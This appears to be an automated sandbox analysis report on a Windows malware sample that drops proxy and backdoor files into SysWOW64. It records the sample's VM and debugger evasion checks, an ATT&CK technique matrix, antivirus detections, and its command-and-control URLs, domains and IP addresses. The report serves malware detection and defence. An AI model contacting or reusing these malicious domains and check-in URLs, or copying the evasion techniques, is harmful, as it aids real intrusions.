Source: C:\Windows\SysWOW64\ctfmen.exeUnpacked PE file: 8.2.ctfmen.exe.400000.0.unpack 5341ganw:EW;5381kecv:W;5173uvsz:W; vs 5341ganw:ER;5381kecv:R;5173uvsz:W;
Source: C:\Windows\SysWOW64\smnss.exeUnpacked PE file: 10.2.smnss.exe.400000.0.unpack k29dbxfe:EW;49jcyvnd:EW;5053anko:W; vs k29dbxfe:ER;49jcyvnd:ER;5053anko:W;
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_0041CC17 pushfd ; retf 0_2_0041CC18
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_1000AAD4 push edi; iretd 0_2_1000AAD7
Source: C:\Windows\SysWOW64\smnss.exeCode function: 1_2_0041CC17 pushfd ; retf 1_2_0041CC18
Source: GxELazkKkG.exeStatic PE information: section name: 6g07wrku
Source: GxELazkKkG.exeStatic PE information: section name: 6365kzxz
Source: GxELazkKkG.exeStatic PE information: section name: 6052xbfe
Source: ctfmen.exe.0.drStatic PE information: section name: 5341ganw
Source: ctfmen.exe.0.drStatic PE information: section name: 5381kecv
Source: ctfmen.exe.0.drStatic PE information: section name: 5173uvsz
Source: shervans.dll.0.drStatic PE information: section name: g09zvksn
Source: shervans.dll.0.drStatic PE information: section name: 513yssam
Source: shervans.dll.0.drStatic PE information: section name: g416uwzk
Source: grcopy.dll.0.drStatic PE information: section name: k29dbxfe
Source: grcopy.dll.0.drStatic PE information: section name: 49jcyvnd
Source: grcopy.dll.0.drStatic PE information: section name: 5053anko
Source: smnss.exe.0.drStatic PE information: section name: k29dbxfe
Source: smnss.exe.0.drStatic PE information: section name: 49jcyvnd
Source: smnss.exe.0.drStatic PE information: section name: 5053anko
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_00436CF0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00436CF0
Source: initial sampleStatic PE information: section where entry point is pointing to: 6365kzxz
Source: initial sampleStatic PE information: section name: 6365kzxz entropy: 7.8721425392681015
Source: initial sampleStatic PE information: section name: 513yssam entropy: 7.547400585476299
Source: initial sampleStatic PE information: section name: 49jcyvnd entropy: 7.8721425392681015
Source: initial sampleStatic PE information: section name: 49jcyvnd entropy: 7.8721425392681015

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\GxELazkKkG.exeExecutable created and started: C:\Windows\SysWOW64\ctfmen.exeJump to behavior
Source: C:\Windows\SysWOW64\ctfmen.exeExecutable created and started: C:\Windows\SysWOW64\smnss.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeFile created: C:\Windows\SysWOW64\shervans.dllJump to dropped file
Source: C:\Users\user\Desktop\GxELazkKkG.exeFile created: C:\Windows\SysWOW64\ctfmen.exeJump to dropped file
Source: C:\Users\user\Desktop\GxELazkKkG.exeFile created: C:\Windows\SysWOW64\smnss.exeJump to dropped file
Source: C:\Users\user\Desktop\GxELazkKkG.exeFile created: C:\Windows\SysWOW64\grcopy.dllJump to dropped file
Source: C:\Users\user\Desktop\GxELazkKkG.exeFile created: C:\Windows\SysWOW64\shervans.dllJump to dropped file
Source: C:\Users\user\Desktop\GxELazkKkG.exeFile created: C:\Windows\SysWOW64\ctfmen.exeJump to dropped file
Source: C:\Users\user\Desktop\GxELazkKkG.exeFile created: C:\Windows\SysWOW64\smnss.exeJump to dropped file
Source: C:\Users\user\Desktop\GxELazkKkG.exeFile created: C:\Windows\SysWOW64\grcopy.dllJump to dropped file
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\SysWOW64\smnss.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-4034
Source: C:\Windows\SysWOW64\smnss.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-4034
Source: C:\Users\user\Desktop\GxELazkKkG.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-4702
Source: C:\Users\user\Desktop\GxELazkKkG.exeStalling execution: Execution stalls by calling Sleepgraph_0-4484
Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: vmware qemu qemu vbox 0_2_00404990
Source: C:\Windows\SysWOW64\smnss.exeCode function: vmware qemu qemu vbox 1_2_00404990
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_00406BEA0_2_00406BEA
Source: C:\Windows\SysWOW64\smnss.exeCode function: 1_2_00406BEA1_2_00406BEA
Source: C:\Windows\SysWOW64\smnss.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_1-5177
Source: C:\Users\user\Desktop\GxELazkKkG.exe TID: 6008Thread sleep time: -480000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exe TID: 6020Thread sleep time: -140000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\smnss.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_1-4104
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_0040814C GetSystemTime followed by cmp: cmp ax, 0010h and CTI: jbe 00408174h0_2_0040814C
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_0040814C GetSystemTime followed by cmp: cmp ax, 000bh and CTI: jbe 00408185h0_2_0040814C
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_0040814C GetSystemTime followed by cmp: cmp ax, 001eh and CTI: jbe 00408196h0_2_0040814C
Source: C:\Windows\SysWOW64\smnss.exeCode function: 1_2_0040814C GetSystemTime followed by cmp: cmp ax, 0010h and CTI: jbe 00408174h1_2_0040814C
Source: C:\Windows\SysWOW64\smnss.exeCode function: 1_2_0040814C GetSystemTime followed by cmp: cmp ax, 000bh and CTI: jbe 00408185h1_2_0040814C
Source: C:\Windows\SysWOW64\smnss.exeCode function: 1_2_0040814C GetSystemTime followed by cmp: cmp ax, 001eh and CTI: jbe 00408196h1_2_0040814C
Source: C:\Users\user\Desktop\GxELazkKkG.exeThread delayed: delay time: 480000Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_1-4063
Source: C:\Users\user\Desktop\GxELazkKkG.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_0-4730
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_00406BEA0_2_00406BEA
Source: C:\Windows\SysWOW64\smnss.exeCode function: 1_2_00406BEA1_2_00406BEA
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_00403790 _mbscpy,memset,FindFirstFileA,FindNextFileA,lstrcpy,_mbscat,FindClose,0_2_00403790
Source: C:\Windows\SysWOW64\smnss.exeCode function: 1_2_00403790 _mbscpy,memset,FindFirstFileA,FindNextFileA,lstrcpy,KiUserExceptionDispatcher,_mbscat,FindClose,1_2_00403790
Source: C:\Users\user\Desktop\GxELazkKkG.exeThread delayed: delay time: 480000Jump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeAPI call chain: ExitProcess graph end nodegraph_0-4548
Source: C:\Users\user\Desktop\GxELazkKkG.exeAPI call chain: ExitProcess graph end nodegraph_0-4813
Source: C:\Users\user\Desktop\GxELazkKkG.exeAPI call chain: ExitProcess graph end nodegraph_0-4641
Source: C:\Windows\SysWOW64\smnss.exeAPI call chain: ExitProcess graph end nodegraph_1-3869
Source: C:\Windows\SysWOW64\smnss.exeAPI call chain: ExitProcess graph end nodegraph_1-3880
Source: C:\Windows\SysWOW64\smnss.exeAPI call chain: ExitProcess graph end nodegraph_1-5268
Source: C:\Windows\SysWOW64\smnss.exeAPI call chain: ExitProcess graph end nodegraph_1-4270
Source: C:\Windows\SysWOW64\smnss.exeAPI call chain: ExitProcess graph end nodegraph_1-3973
Source: C:\Windows\SysWOW64\smnss.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Jump to behavior
Source: C:\Windows\SysWOW64\smnss.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Setup\Jump to behavior
Source: smnss.exe, 0000000A.00000002.259283058.0000000000401000.00000040.00000001.01000000.00000005.sdmpBinary or memory string: vmware
Source: svchost.exe, 00000012.00000002.513732830.000001EC0F9B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
Source: smnss.exe, 00000006.00000002.256003988.0000000000927000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
Source: svchost.exe, 00000012.00000002.513732830.000001EC0F9B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7,1
Source: svchost.exe, 00000012.00000002.513768127.000001EC0F9C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
Source: smnss.exe, 0000000A.00000002.259283058.0000000000401000.00000040.00000001.01000000.00000005.sdmpBinary or memory string: rbhtmlhtmtxtxmldocpltbbSoftware\Microsoft\WAB\WAB4\Wab File Nametepbcl.qyyReadme.exefoto.pifFbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\IrefvbafgngrzvqhfrehfonpgvikgbeeuswkcnfjpafwIHYanFuibyanFlfgrz\PheeragPbagebyFrg\Freivprf\FunerqNpprffStartPYFVQ\{R6SO5R20-QR35-11PS-9P87-00NN005127RQ}\VacebpFreire32k_fbpxf5nnauser32.dllfureinaf.qyypgszra.rkrSeDebugPrivilege%2.2x\virtualvmwareqemuvboxSYSTEM\ControlSet001\Services\Disk\Enum012ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzFbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvbatimerbjvavarg.qyyNTf2000fXpf2003fVIStafWinSUnk192.168.1.2vqhfretepbcl.qyyuser32.dllICQ 8.exeoffice_crack_all.exeWinrar 4.exeK-Lite Codec Pack 7.exeDivX 8.exeACDSee.exeWinamp 7.exeserials 2010.txt.execrack windows 7.execrack windows 8.exemy_passwords.exeFbsgjner\Xnmnn\GenafsreQyQve0\Fbsgjner\vZrfu\TrarenyQbjaybnqQvepgszra.rkrFbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Ehauser32.dll
Source: svchost.exe, 00000012.00000002.513768127.000001EC0F9C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
Source: smnss.exe, 00000005.00000002.253395913.0000000000967000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: smnss.exe, 00000001.00000000.262979672.0000000000968000.00000004.00000020.00020000.00000000.sdmp, smnss.exe, 00000001.00000000.261218321.0000000000968000.00000004.00000020.00020000.00000000.sdmp, smnss.exe, 00000001.00000002.285811058.0000000000968000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllii

Anti Debugging

barindex
Source: C:\Users\user\Desktop\GxELazkKkG.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_0-4610
Source: C:\Windows\SysWOW64\smnss.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_1-3942
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_00404AB8 IsDebuggerPresent,0_2_00404AB8
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_00436CF0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00436CF0
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_004060AA DnsQuery_A,GetProcessHeap,RtlAllocateHeap,lstrcpy,GlobalFree,0_2_004060AA
Source: C:\Windows\SysWOW64\smnss.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\smnss.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\smnss.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_00401150 SetUnhandledExceptionFilter,__getmainargs,76724600,76724600,_setmode,76724600,76724600,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,76724600,_setmode,76724600,0_2_00401150
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_00401149 SetUnhandledExceptionFilter,__getmainargs,76724600,76724600,_setmode,76724600,76724600,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,0_2_00401149
Source: C:\Windows\SysWOW64\smnss.exeCode function: 1_2_00401150 SetUnhandledExceptionFilter,__getmainargs,76724600,76724600,_setmode,76724600,76724600,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,76724600,_setmode,76724600,1_2_00401150
Source: C:\Windows\SysWOW64\smnss.exeCode function: 1_2_00401149 SetUnhandledExceptionFilter,__getmainargs,76724600,76724600,_setmode,76724600,76724600,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,76724600,_setmode,76724600,1_2_00401149
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\ctfmen.exe ctfmen.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeProcess created: C:\Windows\SysWOW64\smnss.exe C:\Windows\system32\smnss.exeJump to behavior
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_00407C4E GetLocalTime,CreateThread,0_2_00407C4E
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_00405256 GetVersionExA,0_2_00405256
Source: svchost.exe, 00000012.00000002.513755072.000001EC0F9BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe
Source: svchost.exe, 00000012.00000002.513629737.000001EC0F954000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
Source: svchost.exe, 00000012.00000002.513755072.000001EC0F9BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe
Source: C:\Users\user\Desktop\GxELazkKkG.exeCode function: 0_2_10002020 xproxy_th@4,WSAStartup,socket,htons,rot13,Get_Reg_SZ,Get_Reg_SZ,rot13,rot13,bind,listen,accept,create_thread,closesocket,0_2_10002020
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts12
Native API
1
DLL Side-Loading
1
Access Token Manipulation
12
Masquerading
1
Input Capture
11
System Time Discovery
Remote Services1
Input Capture
Exfiltration Over Other Network Medium2
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
Process Injection
351
Virtualization/Sandbox Evasion
LSASS Memory471
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
Exfiltration Over Bluetooth2
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)1
DLL Side-Loading
1
Access Token Manipulation
Security Account Manager351
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
Process Injection
NTDS1
Process Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer2
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information
LSA Secrets1
Remote System Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common3
Obfuscated Files or Information
Cached Domain Credentials2
File and Directory Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items12
Software Packing
DCSync13
System Information Discovery
Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 740373 Sample: GxELazkKkG.exe Startdate: 07/11/2022 Architecture: WINDOWS Score: 100 44 Snort IDS alert for network traffic 2->44 46 Antivirus detection for URL or domain 2->46 48 Antivirus detection for dropped file 2->48 50 5 other signatures 2->50 7 GxELazkKkG.exe 8 7 2->7         started        process3 file4 26 C:\Windows\SysWOW64\smnss.exe, PE32 7->26 dropped 28 C:\Windows\SysWOW64\shervans.dll, PE32 7->28 dropped 30 C:\Windows\SysWOW64\grcopy.dll, PE32 7->30 dropped 32 4 other malicious files 7->32 dropped 52 Detected unpacking (changes PE section rights) 7->52 54 Found evasive API chain (may stop execution after checking mutex) 7->54 56 Found stalling execution ending in API Sleep call 7->56 58 4 other signatures 7->58 11 smnss.exe 6 7->11         started        16 ctfmen.exe 7->16         started        18 svchost.exe 3 7->18         started        20 7 other processes 7->20 signatures5 process6 dnsIp7 38 wwqeemeesr.in 11->38 40 swrhaapnnr.biz 11->40 42 37 other IPs or domains 11->42 34 C:\Windows\SysWOW64\zipfiaq.dll, Zip 11->34 dropped 36 C:\Windows\SysWOW64\zipfi.dll, Zip 11->36 dropped 60 Antivirus detection for dropped file 11->60 62 Detected unpacking (changes PE section rights) 11->62 64 Found evasive API chain (may stop execution after checking mutex) 11->64 74 3 other signatures 11->74 22 WerFault.exe 23 9 11->22         started        66 Machine Learning detection for dropped file 16->66 68 Drops executables to the windows directory (C:\Windows) and starts them 16->68 24 smnss.exe 16->24         started        70 Query firmware table information (likely to detect VMs) 18->70 file8 72 Tries to resolve many domain names, but no domain seems valid 40->72 signatures9 process10

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
GxELazkKkG.exe100%ReversingLabsWin32.Virus.Hematite
GxELazkKkG.exe100%AviraTR/Proxy.Gen
GxELazkKkG.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Windows\SysWOW64\ctfmen.exe100%AviraTR/Crypt.ULPM.Gen
C:\Windows\SysWOW64\grcopy.dll100%AviraTR/Proxy.Gen
C:\Windows\SysWOW64\smnss.exe100%AviraTR/Proxy.Gen
C:\Windows\SysWOW64\shervans.dll100%AviraBDS/Backdoor.Gen
C:\Windows\SysWOW64\satornas.dll100%AviraHTML/ExpKit.Gen2
C:\Windows\SysWOW64\ctfmen.exe100%Joe Sandbox ML
C:\Windows\SysWOW64\grcopy.dll100%Joe Sandbox ML
C:\Windows\SysWOW64\zipfiaq.dll100%Joe Sandbox ML
C:\Windows\SysWOW64\smnss.exe100%Joe Sandbox ML
C:\Windows\SysWOW64\zipfi.dll100%Joe Sandbox ML
C:\Windows\SysWOW64\shervans.dll100%Joe Sandbox ML
SourceDetectionScannerLabelLinkDownload
7.0.smnss.exe.400000.1.unpack100%AviraTR/Proxy.GenDownload File
5.0.smnss.exe.400000.3.unpack100%AviraTR/Proxy.GenDownload File
4.0.smnss.exe.400000.1.unpack100%AviraTR/Proxy.GenDownload File
1.0.smnss.exe.400000.5.unpack100%AviraTR/Proxy.GenDownload File
4.0.smnss.exe.400000.2.unpack100%AviraTR/Proxy.GenDownload File
8.2.ctfmen.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
0.2.GxELazkKkG.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
3.0.smnss.exe.400000.1.unpack100%AviraTR/Proxy.GenDownload File
5.0.smnss.exe.400000.0.unpack100%AviraTR/Proxy.GenDownload File
4.2.smnss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
3.0.smnss.exe.400000.3.unpack100%AviraTR/Proxy.GenDownload File
3.0.smnss.exe.400000.2.unpack100%AviraTR/Proxy.GenDownload File
2.0.smnss.exe.400000.1.unpack100%AviraTR/Proxy.GenDownload File
3.0.smnss.exe.400000.0.unpack100%AviraTR/Proxy.GenDownload File
0.0.GxELazkKkG.exe.400000.0.unpack100%AviraTR/Proxy.GenDownload File
3.2.smnss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
4.0.smnss.exe.400000.0.unpack100%AviraTR/Proxy.GenDownload File
1.0.smnss.exe.400000.2.unpack100%AviraTR/Proxy.GenDownload File
2.0.smnss.exe.400000.3.unpack100%AviraTR/Proxy.GenDownload File
6.0.smnss.exe.400000.3.unpack100%AviraTR/Proxy.GenDownload File
6.0.smnss.exe.400000.0.unpack100%AviraTR/Proxy.GenDownload File
1.0.smnss.exe.400000.4.unpack100%AviraTR/Proxy.GenDownload File
6.0.smnss.exe.400000.2.unpack100%AviraTR/Proxy.GenDownload File
7.0.smnss.exe.400000.2.unpack100%AviraTR/Proxy.GenDownload File
7.0.smnss.exe.400000.3.unpack100%AviraTR/Proxy.GenDownload File
9.0.smnss.exe.400000.0.unpack100%AviraTR/Proxy.GenDownload File
2.0.smnss.exe.400000.2.unpack100%AviraTR/Proxy.GenDownload File
5.0.smnss.exe.400000.1.unpack100%AviraTR/Proxy.GenDownload File
5.0.smnss.exe.400000.2.unpack100%AviraTR/Proxy.GenDownload File
6.0.smnss.exe.400000.1.unpack100%AviraTR/Proxy.GenDownload File
0.2.GxELazkKkG.exe.10000000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
7.0.smnss.exe.400000.0.unpack100%AviraTR/Proxy.GenDownload File
2.0.smnss.exe.400000.0.unpack100%AviraTR/Proxy.GenDownload File
5.2.smnss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
7.2.smnss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
10.0.smnss.exe.400000.0.unpack100%AviraTR/Proxy.GenDownload File
1.2.smnss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
1.0.smnss.exe.400000.0.unpack100%AviraTR/Proxy.GenDownload File
9.2.smnss.exe.400000.0.unpack100%AviraTR/Proxy.GenDownload File
2.2.smnss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
1.0.smnss.exe.400000.3.unpack100%AviraTR/Proxy.GenDownload File
8.0.ctfmen.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
10.2.smnss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
6.2.smnss.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
4.0.smnss.exe.400000.3.unpack100%AviraTR/Proxy.GenDownload File
1.0.smnss.exe.400000.1.unpack100%AviraTR/Proxy.GenDownload File
No Antivirus matches
SourceDetectionScannerLabelLink
http://enahmnhqah.ws/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk100%Avira URL Cloudmalware
http://hmpasnpmas.net/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk100%Avira URL Cloudmalware
http://rmhhhmswqh.org/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk100%Avira URL Cloudmalware
http://meahewphwa.in/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk100%Avira URL Cloudmalware
http://pqarseshhn.in/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk100%Avira URL Cloudmalware
http://whenaeqsar.in/imgs/krewa/nqxa.php?id=f21eztiy&s5=3159&lip=192.168.2.7&win=Unk100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
enahmnhqah.ws
64.70.19.203
truetrue
    unknown
    meahewphwa.in
    199.21.76.81
    truetrue
      unknown
      whenaeqsar.in
      107.6.74.76
      truetrue
        unknown
        rmhhhmswqh.org
        72.251.233.245
        truetrue
          unknown
          pqarseshhn.in
          173.231.189.15
          truetrue
            unknown
            hmpasnpmas.net
            173.231.184.124
            truetrue
              unknown
              erwrahwnhs.ws
              64.70.19.203
              truetrue
                unknown
                pnhhpawqpa.in
                unknown
                unknowntrue
                  unknown
                  amnrsmaaqh.com
                  unknown
                  unknowntrue
                    unknown
                    nmnhwanmwh.us
                    unknown
                    unknowntrue
                      unknown
                      psmrewwhhh.in
                      unknown
                      unknowntrue
                        unknown
                        hemqhqaema.net
                        unknown
